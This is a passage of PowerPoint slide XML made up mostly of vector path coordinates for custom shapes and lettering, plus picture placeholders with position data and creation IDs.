                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215590" y="95544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221036" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231500" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235646" y="95768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243123" y="93878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246383" y="92699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="90972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="80649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221706" y="80649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217484" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217270" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210734" y="72156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209129" y="67177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209129" y="54274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210693" y="49255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216952" y="41838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221442" y="39989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="39989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="29850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246760" y="28244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243103" y="26923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235239" y="24891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230952" y="24404"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="250154" y="72339"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="247065" y="72339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246171" y="73192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245216" y="74066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230363" y="80649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="80649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="72339"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="250154" y="39989"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="229875" y="39989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232171" y="40294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236133" y="41452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247065" y="48483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="48483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250154" y="39989"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="288700" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266775" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266775" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288700" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288700" y="72054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294593" y="64800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319067" y="64800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313334" y="56326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288700" y="56326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288700" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="319067" y="64800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="294593" y="64800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313693" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339113" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319067" y="64800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="337366" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="312169" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288700" y="56326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313334" y="56326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312880" y="55656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337366" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="386397" y="24160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="350268" y="45625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347688" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348370" y="68788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372108" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372288" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380376" y="95677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390034" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395337" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400173" y="95808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408911" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413564" y="92577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418502" y="90606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418502" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385117" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379610" y="79471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372132" y="73822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370100" y="69738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369775" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419782" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419782" y="56733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419500" y="52752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419418" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369714" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370023" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370039" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371543" y="43261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374266" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376893" y="38953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380423" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415338" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415058" y="37219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411390" y="32552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406696" y="28883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400966" y="26261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394580" y="24774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395515" y="24774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386397" y="24160"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="418502" y="73070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="416063" y="73070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413564" y="74960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410150" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401494" y="80060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397024" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418502" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418502" y="73070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="415338" y="37815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="389160" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392513" y="38953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394646" y="41269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396800" y="43566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397839" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397918" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398040" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419418" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419256" y="49311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417865" y="43566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417791" y="43261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417681" y="42806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415338" y="37815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="459588" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="437683" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437683" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459588" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459588" y="48788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462331" y="47812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464891" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469646" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459588" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459588" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="487080" y="46329"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="480133" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482711" y="46532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484215" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485244" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="46329"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="487080" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="477777" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475661" y="26720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468569" y="29423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464383" y="32166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459588" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487080" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="590405" y="4063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="546312" y="4063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546312" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569598" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569598" y="65003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590710" y="65003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617491" y="47934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569598" y="47934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569598" y="21193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619048" y="21193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616089" y="15463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613305" y="12395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606620" y="8026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603146" y="6543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595241" y="4551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590405" y="4063"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="619048" y="21193"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="585142" y="21193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587500" y="21722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591767" y="23428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593352" y="24709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596115" y="28366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596786" y="30561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596786" y="35681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580245" y="47934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617491" y="47934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620173" y="40578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620885" y="36636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620885" y="27370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620042" y="23428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619930" y="22900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619048" y="21193"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="684830" y="2296"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="674142" y="2296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667803" y="3393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638055" y="29850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634844" y="42184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634844" y="57017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656688" y="91236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674244" y="96194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685501" y="96194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689057" y="95971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693532" y="95199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693720" y="95199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="88412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="78719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681782" y="78719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679151" y="78292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678970" y="78292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672720" y="76342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659065" y="55046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659065" y="43992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681335" y="19791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="19791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="9834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688264" y="2519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684830" y="2296"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="712953" y="66812"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="710514" y="66812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709437" y="67787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708035" y="68925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704642" y="71587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702793" y="72826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700802" y="74005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="698285" y="75529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695905" y="76606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690357" y="78292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687553" y="78719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="78719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="66812"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="712953" y="19791"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="687553" y="19791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690867" y="20299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690572" y="20299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710340" y="31800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="31800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712953" y="19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9" name="object 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6EBACFF-5B54-E535-DD1B-106165086CD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74089" y="3025203"/>
              <a:ext cx="603836" cy="252008"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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76D8D7FD-CF36-EC94-F9E3-F1025C6B4E2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3734435" y="3297999"/>
              <a:ext cx="3444875" cy="212090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3444875" h="212089">
                  <a:moveTo>
                    <a:pt x="908392" y="123444"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1625" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="12090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="906741" y="135534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908392" y="123444"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3444875" h="212089">
                  <a:moveTo>
                    <a:pt x="1636052" y="121881"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1320596" y="120357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1320533" y="132549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1636001" y="134073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1636052" y="121881"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3444875" h="212089">
                  <a:moveTo>
                    <a:pt x="3444341" y="199669"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2909430" y="121945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2907677" y="134010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3442589" y="211734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3444341" y="199669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1" name="object 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E5C7FE6-FBBB-BDAC-F83C-1B880BBEB13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96636" y="2932199"/>
              <a:ext cx="527293" cy="990598"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="object 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5092DF42-029D-58DA-03E6-A07BF1DA6B59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49382" y="2787433"/>
              <a:ext cx="242574" cy="216386"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="object 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3966DD04-95FD-155E-4B5D-16052A6B9C7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91534" y="2530371"/>
              <a:ext cx="654390" cy="955040"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="object 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23AA00AC-D962-406A-88B9-D6108FEDD18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25048" y="2760753"/>
              <a:ext cx="694928" cy="790950"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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64288506-BD99-0885-DDF8-BF45A23AD052}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2624286" y="2759961"/>
              <a:ext cx="696595" cy="793115"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="236976" y="713383"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="137156" y="731672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137156" y="750381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262823" y="792527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271189" y="791019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263127" y="791019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140316" y="749833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138287" y="749284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138162" y="749111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="733056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138061" y="733056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="732307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142148" y="732307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="714654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238500" y="714019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="714019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236976" y="713383"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="562343" y="737005"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="262599" y="791019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271189" y="791019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="738278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="737641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="737641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="737005"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="138162" y="749111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138162" y="749111"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="138680" y="749284"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140316" y="749833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749284"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="138680" y="749111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138162" y="749111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="749111"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="562343" y="722181"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="737641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562877" y="737005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="737005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="722359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562851" y="722359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="722181"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="563867" y="737005"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562877" y="737005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="737641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="737641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563867" y="737005"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="138680" y="732307"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138061" y="733056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="733056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="732307"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="696595" h="793114">
                  <a:moveTo>
                    <a:pt x="142148" y="732307"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138680" y="732307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138680" y="733056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138061" y="733056"/>
                  </a:lnTo>
